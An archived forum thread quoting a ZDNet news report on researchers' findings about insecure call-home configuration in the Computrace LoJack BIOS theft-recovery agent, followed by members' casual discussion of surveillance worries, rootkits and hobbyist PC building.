Jump to content
House Price Crash Forum

Archived

This topic is now archived and is closed to further replies.

interestrateripoff

Researchers Find Insecure Bios 'rootkit' Pre-loaded In Laptops

Recommended Posts

http://blogs.zdnet.com/security/?p=3828&tag=nl.e550

LAS VEGAS — A popular laptop theft-recovery service that ships on notebooks made by HP, Dell, Lenovo, Toshiba, Gateway, Asus and Panasonic is actually a dangerous BIOS rootkit that can be hijacked and controlled by malicious hackers.

The service — called Computrace LoJack for Laptops — contains design vulnerabilities and a lack of strong authentication that can lead to “a complete and persistent compromise of an affected system,†according to Black Hat conference presentation by researchers Alfredo Ortega and Anibal Sacco from Core Security Technologies.

Computrace LoJack for Laptops, which is is pre-installed on about 60 percent of all new laptops, is a software agent that lives in the BIOS and periodically calls home to a central authority for instructions in case a laptop is stolen. The call-home mechanism allows the central authority to instruct the BIOS agent to

wipe all information as a security measure, or to track the whereabouts of

the system.

For it to be an effective theft-recover service, Ortega and Sacco explained that it has to be stealthy, must have complete control of the system and must be highly-persistent to survive a hard disk wipe or operating system reinstall.

“This is a rootkit. It might be legitimate rootkit, but it’s a dangerous rootkit,†Sacco declared. The research team stumbled upon the rootkit-like technology in the course of their work on BIOS-based malware attacks. At last year’s CanSecWest security conference, the duo demonstrate methods for infecting the BIOS with persistent code that survive reboots and reflashing attempts.

The biggest problem, Ortega explained, is that a malicious hacker can manipulate and control the call-home process. That’s because the technology uses a configuration method that contains the IP address, port and URL, all hard-coded in the Option-ROM. At first run, Sacco explained that the configuration method is copied in many places, including the registry and hard-disk inter-partition space.

The duo found that it’s trivial to search and modify the configuration, giving them the ability to point the the IP and URL to a malicious site, where un-authenticated payloads can be directed to laptop.

Because the rootkit is white-listed by anti-virus software, the malicious modifications will go unnoticed. On unsigned BIOSes, Sacco and Ortega aid modification of the configuration allows for a very persistent and dangerous form of rootkit.

So the govt could effectively take control of 60% of laptops? Your thoughts will be controlled.

Share this post


Link to post
Share on other sites

Would this only work on laptops hooked up to go onto the net? Or is this "call home" mechanism something different?

Glad I've taken the precaution of a dedicated browser machine with other PCs and laptops off-line.

Also hate the fact that all new laptops seem to have a webcam built in. Combine this "call home" with a webcam link = camera in every house.

Share this post


Link to post
Share on other sites

So even putting liniux on your machine does not save you from goverment snoops.

Encryption is going to become the norm as years go by unless you don't mind big bro reading every dam word you write.

forgot main stream encryption write your own that can link into plugable email agents running on the server

Share this post


Link to post
Share on other sites
WE are talking about computers not fasion toys :lol:

I'll remember that next time I am running virtualised windows faster than the guy on the dell.

:P

Share this post


Link to post
Share on other sites
I'll remember that next time I am running virtualised windows faster than the guy on the dell.

:P

/pats his refurbished HP NW8000

Pretty good combination of portability, performance, battery life and features. Not bad for ~£150 last year...has an XP Pro licence too. :)

Share this post


Link to post
Share on other sites
Would this only work on laptops hooked up to go onto the net? Or is this "call home" mechanism something different?

Glad I've taken the precaution of a dedicated browser machine with other PCs and laptops off-line.

Also hate the fact that all new laptops seem to have a webcam built in. Combine this "call home" with a webcam link = camera in every house.

You would be horrified if you go into your menu system of the Adobe Flash software needed for certain internet sites.

Defaults = microphone and webcam connection set to "ON" plus other highly dubious, unnecessary connections.

I can only say they have been put on there to SPY on you!

Only found these by accident.

Share this post


Link to post
Share on other sites
/pats his refurbished HP NW8000

Pretty good combination of portability, performance, battery life and features. Not bad for ~£150 last year...has an XP Pro licence too. :)

horses for courses.

pats his top end macbook pro, with windows XP, windows Vista (urgh), Linux, and MOSX 10.5.

:)

Share this post


Link to post
Share on other sites
horses for courses.

pats his top end macbook pro, with windows XP, windows Vista (urgh), Linux, and MOSX 10.5.

:)

Pfft. Really, I could spend the money on other more important stuff, but fair play to you if a MBP was within your budget. :)

Share this post


Link to post
Share on other sites
This will only work with rootkits installed on the Harddisk not the bios.

Rootkits actually were common place in the DOS days before windows but then the AV companies got lazy or young blood in the AV companies didnt know about the old school ways of doing somethings, just like many cant program in say assembler a low level language but can use a high level language like VB.net or C#.

I think you miss my point - the software that was described as a rootkit, is not a rootkit. It is legitimate software - just badly written, and thus opens holes that it shouldn't.

Strictly speaking even then it's not a rootkit, which is instead a collection of packages that you install so that no one knows you have taken over the computer, rather than the takeover vector itself. For instance you might, on *nix, install a new version of 'ls' that doesn't report modify dates correctly on certain files that you have changed, or a version of 'rm' that won't delete certain files. I took over a server that had been rooted from another admin a few years back, which also had no backups. It took about two weeks to untangle everything.

Share this post


Link to post
Share on other sites
Pfft. Really, I could spend the money on other more important stuff, but fair play to you if a MBP was within your budget. :)

Freebie, but to be honest, given the amount of time the wf, mum, dad, inlaws, etc spend cursing their slow and unreliable PCs, I'd've spent the money.

Share this post


Link to post
Share on other sites
Freebie, but to be honest, given the amount of time the wf, mum, dad, inlaws, etc spend cursing their slow and unreliable PCs, I'd've spent the money.

Well I've built systems from £50 if it was required. The downside is no warranty, but its rare for anything to break provided it was of a decent manufacture to begin with. Sold a friend a used system 4 years back and only one item needed replacing since then, wasn't particularly expensive either. Considering the unit itself is coming up to 6 years old that isn't bad.

Share this post


Link to post
Share on other sites

I got a rootkit virus recently. Persistent little bugger.

It didn't stand a chance against me though. I formatted the drive and now I got a PC twice as fast ;)

Share this post


Link to post
Share on other sites
Well I've built systems from £50 if it was required. The downside is no warranty, but its rare for anything to break provided it was of a decent manufacture to begin with. Sold a friend a used system 4 years back and only one item needed replacing since then, wasn't particularly expensive either. Considering the unit itself is coming up to 6 years old that isn't bad.

Sure - it's rarely the hardware they have a problem with (well now that the capacitor plague has died out), just the OS.

I've also built any number of systems, mac and pc. My biggest challenge was taking the parts from an eMac, and powerbook, and a Dell, and fusing them altogether into a working Hackintosh. The real challenge was that I had to create half the connectors myself, and do some motherboard SMT desoldering to get it to work. Of course to be fair you should probably price your time in too.

All that being said, it's a hell of a lot easier to home build a desktop than a laptop (although I do have two old powerbooks sitting in a cupboard that I am trying to turn into a dual screen tablet mac, but that's going a bit slowly!)

Share this post


Link to post
Share on other sites
I got a rootkit virus recently. Persistent little bugger.

It didn't stand a chance against me though. I formatted the drive and now I got a PC twice as fast ;)

unless it was a bios virus of course - then it'll be back!!!

:ph34r:

Share this post


Link to post
Share on other sites
Sure - it's rarely the hardware they have a problem with (well now that the capacitor plague has died out), just the OS.

Heh. I have a working Packard Bell 9450 system (Slot 1!) from 1998 sat here next to me, I use it for legacy applications. Apart from the PSU nothing's needed replacing yet.

I've also built any number of systems, mac and pc. My biggest challenge was taking the parts from an eMac, and powerbook, and a Dell, and fusing them altogether into a working Hackintosh. The real challenge was that I had to create half the connectors myself, and do some motherboard SMT desoldering to get it to work. Of course to be fair you should probably price your time in too.

I'm not that great when it comes to electrical work though :P doing a solder job is only worth the risk on something old as far as I'm concerned. Parts are cheap enough that making PCBs\connectors myself is a waste of effort.

All that being said, it's a hell of a lot easier to home build a desktop than a laptop (although I do have two old powerbooks sitting in a cupboard that I am trying to turn into a dual screen tablet mac, but that's going a bit slowly!)

Indeed it is. I've been able to get used laptop motherboards in some cases, HP Evos for example (the graphics controller often gets improved with the replacement too).

Share this post


Link to post
Share on other sites
I'm not that great when it comes to electrical work though :P doing a solder job is only worth the risk on something old as far as I'm concerned. Parts are cheap enough that making PCBs\connectors myself is a waste of effort.

Sure it's only worth it when you have to, like when you want to connect some non-standard dell connector to some non standard foxxconn (apple) connector. Luckily I get lots of practice at really hard-arsed soldering in the day-job. Quite often requiring a microscope to see what you're doing!

My dad still has an 286 from the early eighties so that he can look at wordPerfect files! Every few years he digs it out to look through a floppy. Built to last in those days.

Share this post


Link to post
Share on other sites
Guest DisposableHeroes
Sure it's only worth it when you have to, like when you want to connect some non-standard dell connector to some non standard foxxconn (apple) connector. Luckily I get lots of practice at really hard-arsed soldering in the day-job. Quite often requiring a microscope to see what you're doing!

My dad still has an 286 from the early eighties so that he can look at wordPerfect files! Every few years he digs it out to look through a floppy. Built to last in those days.

Funny you should say that, my dad just cleared out his loft.

386

486

Comadore vic 20 (tape games)

Comadore + 4 (tape games)

Amstrad 9512 CPM - which dos was based on.

My brother found his old walkman, tape radio stereo recorder, mint condition.

But what the hell can you do with it all. Might start a little museum.

Share this post


Link to post
Share on other sites
Sure it's only worth it when you have to, like when you want to connect some non-standard dell connector to some non standard foxxconn (apple) connector. Luckily I get lots of practice at really hard-arsed soldering in the day-job. Quite often requiring a microscope to see what you're doing!

I have a Dell motherboard here...socket 478, 400FSB, SDRAM, no AGP slot :P front USB and audio are proprietary but I have the cables\PCBs for them. Just need to figure out how to slot them securely in a case somewhere...

My dad still has an 286 from the early eighties so that he can look at wordPerfect files! Every few years he digs it out to look through a floppy. Built to last in those days.

Yeah, tech getting cheaper hasn't necessarily retained the same level of build quality.

Share this post


Link to post
Share on other sites

  • Recently Browsing   0 members

    No registered users viewing this page.

  • The Prime Minister stated that there were three Brexit options available to the UK:   295 members have voted

    1. 1. Which of the Prime Minister's options would you choose?


      • Leave with the negotiated deal
      • Remain
      • Leave with no deal

    Please sign in or register to vote in this poll. View topic


×

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.